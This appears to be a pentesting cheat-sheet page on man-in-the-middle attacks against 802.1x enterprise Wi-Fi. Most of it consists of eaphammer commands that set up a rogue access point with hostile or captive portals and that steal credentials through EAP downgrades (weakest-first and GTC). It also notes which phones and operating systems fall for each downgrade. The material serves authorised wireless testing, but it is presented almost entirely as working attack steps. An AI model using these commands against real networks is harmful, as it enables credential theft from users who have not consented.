802.1x
MiTMâ
The option --hostile-portal starts Responder. Depending on the scenario, remove the --hostile-portal option and start tools like Responder or Bettercap on your own.
./ehdb --add --identity <user> [--password <password> | --nt-hash <NT>]
./eaphammer -i wlan0 -b <BSSID> -e <ESSID> -c <channel> --auth wpa-eap --hostile-portal
./ehdb --add --identity <user> [--password <password> | --nt-hash <NT>]
./eaphammer -i wlan0 -b <BSSID> -e <ESSID> -c <channel> --auth wpa-eap --captive-portal
For the phishing scenarios see here.
Stealing credentials - GTC downgradeâ
During the negotiation there are two indicators on the wireless endpoint : EAP method not supported by legitimate AP and EAP methods are suggested in a different order.
Efficient against Android phones.
Efficient against iOS but it prompt for certificate.
Only a challenge-response against Windows can be captured.
Balanced Approach (default)â
Phase 1 (outer authentication): PEAP,TTLS,TLS,FAST
Phase 2 (inner authentication): GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5
./eaphammer -i <wlan0> --auth wpa-eap -e <ESSID> --creds -c <same_channel> -b <similar_BSSID>
Weakest to strongestâ
Phase 1 (outer authentication): PEAP,TTLS,TLS,FAST
Phase 2 (inner authentication): GTC,TTLS-PAP,MD5,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,TTLS-MSCHAPV2,TTLS
./eaphammer -i <wlan0> --negotiate weakest --auth wpa-eap -e <ESSID> --creds -c <channel> -b <BSSID>
Explicit GTC downgradeâ
./eaphammer -i <wlan0> --negotiate gtc-downgrade --auth wpa-eap -e <ESSID> --creds -c <channel> -b <BSSID>